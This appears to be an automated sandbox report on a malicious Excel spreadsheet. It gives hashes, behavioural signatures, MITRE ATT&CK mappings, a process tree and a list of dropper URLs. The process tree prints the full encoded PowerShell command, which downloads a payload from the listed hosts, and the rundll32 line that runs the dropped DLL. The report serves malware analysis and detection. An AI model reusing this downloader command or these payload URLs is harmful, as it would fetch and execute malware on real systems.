b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67

General

Target

b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67.bin.xls
Size

138KB
MD5

430d7c853638524e59abe98c593b2ae5
SHA1

6ed415997a658f5b749dded6347bf970acac2601
SHA256

b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67
SHA512

e7100c0e17f4910305077018350c625d815115b09044764d037c98a9b847d48400c8fd7f0fb194617b96ca955f06f5b076e64887c33e89dcac7de08dbb93f40c
SSDEEP

3072:zKehv7q2Pjx45uoDGTj+5xtekEvi8/dg0a3Wm47CdX5gVvhoxzYrasdJXIch1L:Wehv7q2Pjx45uoDGTj+5xtFEvi8/dg0x

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://midnightsilvercrafters.com/store/wBjNOUw/

exe.dropper

http://tempral.com/NATE_05_22_2009/BI710N4cQ6R3/

exe.dropper

https://redington.karmatechmediaworks.com/wp-content/3JVuVx7QUM/

exe.dropper

https://uhc.karmatechmediaworks.com/wp-content/0EqfdeznntlOpaIP2Qv/

exe.dropper

https://servilogic.net/b/14hqrdyP0Z3WsbQib8/

exe.dropper

https://comezmuhendislik.com/ljfrmm/VTpHRFWoORAHnRQ3aQL/

exe.dropper

http://webmail.glemedical.com/wp-content/J1M2xxodH/

exe.dropper

http://toto.karmatechmediaworks.com/wp-content/i826vbcVgRJ/

exe.dropper

https://golfpia.karmatechmediaworks.com/wp-content/oEicpDnEkk/

exe.dropper

https://fortiuspharma.com/y6krss/EGm347cqj5/

exe.dropper

https://garyjharris.com/cgi-bin/0hH/

exe.dropper

https://vietnam.karmatechmediaworks.com/wp-content/PfSVQagusZy7AaMw/

exe.dropper

https://vinculinc.karmatechmediaworks.com/wp-content/VlcOPPwgidWlXDJNs6/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2508	3488	wscript.exe	EXCEL.EXE

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

59 1584 powershell.exe
73 1584 powershell.exe
81 1584 powershell.exe
83 1584 powershell.exe
85 1584 powershell.exe
89 1584 powershell.exe

flow	pid	process
59	1584	powershell.exe
73	1584	powershell.exe
81	1584	powershell.exe
83	1584	powershell.exe
85	1584	powershell.exe
89	1584	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4428 4180 WerFault.exe

pid	pid_target	process	target process
4428	4180	WerFault.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3488 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1584 powershell.exe
1584 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1584 powershell.exe

pid	process
1584	powershell.exe
1584	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1584	powershell.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE
3488	EXCEL.EXE

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

EXCEL.EXEwscript.execmd.execmd.exe

description	pid	process	target process
PID 3488 wrote to memory of 2508	3488	EXCEL.EXE	wscript.exe
PID 3488 wrote to memory of 2508	3488	EXCEL.EXE	wscript.exe
PID 2508 wrote to memory of 3760	2508	wscript.exe	cmd.exe
PID 2508 wrote to memory of 3760	2508	wscript.exe	cmd.exe
PID 3760 wrote to memory of 1584	3760	cmd.exe	powershell.exe
PID 3760 wrote to memory of 1584	3760	cmd.exe	powershell.exe
PID 2508 wrote to memory of 4716	2508	wscript.exe	cmd.exe
PID 2508 wrote to memory of 4716	2508	wscript.exe	cmd.exe
PID 4716 wrote to memory of 4392	4716	cmd.exe	rundll32.exe
PID 4716 wrote to memory of 4392	4716	cmd.exe	rundll32.exe
PID 4716 wrote to memory of 4392	4716	cmd.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67.bin.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\SYSTEM32\wscript.exe
wscript c:\programdata\oue4hjld.vbs
2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\bhnasleil.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAG0AaQBkAG4AaQBnAGgAdABzAGkAbAB2AGUAcgBjAHIAYQBmAHQAZQByAHMALgBjAG8AbQAvAHMAdABvAHIAZQAvAHcAQgBqAE4ATwBVAHcALwAsAGgAdAB0AHAAOgAvAC8AdABlAG0AcAByAGEAbAAuAGMAbwBtAC8ATgBBAFQARQBfADAANQBfADIAMgBfADIAMAAwADkALwBCAEkANwAxADAATgA0AGMAUQA2AFIAMwAvACwAaAB0AHQAcABzADoALwAvAHIAZQBkAGkAbgBnAHQAbwBuAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMASgBWAHUAVgB4ADcAUQBVAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwB1AGgAYwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAEUAcQBmAGQAZQB6AG4AbgB0AGwATwBwAGEASQBQADIAUQB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwBlAHIAdgBpAGwAbwBnAGkAYwAuAG4AZQB0AC8AYgAvADEANABoAHEAcgBkAHkAUAAwAFoAMwBXAHMAYgBRAGkAYgA4AC8ALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AZQB6AG0AdQBoAGUAbgBkAGkAcwBsAGkAawAuAGMAbwBtAC8AbABqAGYAcgBtAG0ALwBWAFQAcABIAFIARgBXAG8ATwBSAEEASABuAFIAUQAzAGEAUQBMAC8ALABoAHQAdABwADoALwAvAHcAZQBiAG0AYQBpAGwALgBnAGwAZQBtAGUAZABpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASgAxAE0AMgB4AHgAbwBkAEgALwAsAGgAdAB0AHAAOgAvAC8AdABvAHQAbwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADgAMgA2AHYAYgBjAFYAZwBSAEoALwAsAGgAdAB0AHAAcwA6AC8ALwBnAG8AbABmAHAAaQBhAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG8ARQBpAGMAcABEAG4ARQBrAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AcgB0AGkAdQBzAHAAaABhAHIAbQBhAC4AYwBvAG0ALwB5ADYAawByAHMAcwAvAEUARwBtADMANAA3AGMAcQBqADUALwAsAGgAdAB0AHAAcwA6AC8ALwBnAGEAcgB5AGoAaABhAHIAcgBpAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAwAGgASAAvACwAaAB0AHQAcABzADoALwAvAHYAaQBlAHQAbgBhAG0ALgBrAGEAcgBtAGEAdABlAGMAaABtAGUAZABpAGEAdwBvAHIAawBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUABmAFMAVgBRAGEAZwB1AHMAWgB5ADcAQQBhAE0AdwAvACwAaAB0AHQAcABzADoALwAvAHYAaQBuAGMAdQBsAGkAbgBjAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbABjAE8AUABQAHcAZwBpAGQAVwBsAFgARABKAE4AcwA2AC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkAD0AKAAiAGMAaQB1AHcAZAA6AGkAdQB3AGQAXABwAHIAaQB1AHcAZABvAGcAaQB1AHcAZAByAGEAbQBpAHUAdwBkAGQAYQB0AGkAdQB3AGQAYQBcAHYAeABjAGoAawBmAGgAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
3⤵
- Suspicious use of WriteProcessMemory
PID:4716

\??\c:\windows\syswow64\rundll32.exe
c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
4⤵
PID:4392

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 412 -p 4180 -ip 4180
1⤵
PID:3104

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4180 -s 1468
1⤵
- Program crash
PID:4428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\programdata\bhnasleil.bat
Filesize
3KB

MD5
0f96848827a2960f874bcf613ce1e72c

SHA1
d936a765910adaf627fc6459716847fd87595ea2

SHA256
9e9915a1e009b7a9283629e5a1a66604915030b445c1f266914955299563473e

SHA512
00f04d42d544c0564ca4d435fbc0803ebcd8eabaa45abc852b449beffb4f3701681b8c908f580640e71686255c83aa698f10ea75a51dd0bf76c177132e86b862

Download Submit
\??\c:\programdata\oue4hjld.vbs
Filesize
604B

MD5
a0e5c8b0ad3da42bf6952871a41bf5e8

SHA1
cd2106ebaf43d596057457e87cf4c8482e246005

SHA256
5c3d66e2d33dfb51c691010af5d0a87250aa475235b537a336c607ade93a881a

SHA512
c685cc80c128087b6711ab65c7a0f2c63f55dfbab8577aea20d668112f77a0e69e7e350ff314201e93b8ef79f72764c79fc20e903c1a1f973e37ae3a873ff725

Download Submit
\??\c:\programdata\vxcjkfhd.dll
Filesize
7KB

MD5
36d7c3349b01442d620f5aab89238341

SHA1
e495ae05df51d476c641769f78a2f4281ecce28f

SHA256
a932553cebf140413ddc9922f3510d64810f6efa7200b4eb1b250d91ea1f358a

SHA512
a1ee9a0272cf749e03dad37cc8eb117ef37b3a9fd7ee5dee9ed0ade670d520ae3a76466f905034d29f18e49577b492aa603bf01599b05860be96a3683755abe9

Download Submit
memory/1584-150-0x000001F2C30F0000-0x000001F2C3112000-memory.dmp

Filesize
136KB

Download
memory/1584-149-0x0000000000000000-mapping.dmp

Download
memory/1584-154-0x00007FFFE6730000-0x00007FFFE71F1000-memory.dmp

Filesize
10.8MB

Download
memory/1584-153-0x000001F2C3E50000-0x000001F2C45F6000-memory.dmp

Filesize
7.6MB

Download
memory/1584-152-0x00007FFFE6730000-0x00007FFFE71F1000-memory.dmp

Filesize
10.8MB

Download
memory/1584-151-0x00007FFFE6730000-0x00007FFFE71F1000-memory.dmp

Filesize
10.8MB

Download
memory/2508-144-0x0000000000000000-mapping.dmp

Download
memory/3488-143-0x00000194DD59D000-0x00000194DD59F000-memory.dmp

Filesize
8KB

Download
memory/3488-136-0x00007FF7D09D0000-0x00007FF7D09E0000-memory.dmp

Filesize
64KB

Download
memory/3488-148-0x00000194DD59D000-0x00000194DD59F000-memory.dmp

Filesize
8KB

Download
memory/3488-139-0x00007FF7D09D0000-0x00007FF7D09E0000-memory.dmp

Filesize
64KB

Download
memory/3488-135-0x00007FF7D09D0000-0x00007FF7D09E0000-memory.dmp

Filesize
64KB

Download
memory/3488-138-0x00007FF7D09D0000-0x00007FF7D09E0000-memory.dmp

Filesize
64KB

Download
memory/3488-142-0x00000194DF0A0000-0x00000194DF0A4000-memory.dmp

Filesize
16KB

Download
memory/3488-141-0x00007FF7CE970000-0x00007FF7CE980000-memory.dmp

Filesize
64KB

Download
memory/3488-140-0x00007FF7CE970000-0x00007FF7CE980000-memory.dmp

Filesize
64KB

Download
memory/3488-137-0x00007FF7D09D0000-0x00007FF7D09E0000-memory.dmp

Filesize
64KB

Download
memory/3760-147-0x0000000000000000-mapping.dmp

Download
memory/4392-156-0x0000000000000000-mapping.dmp

Download
memory/4716-155-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads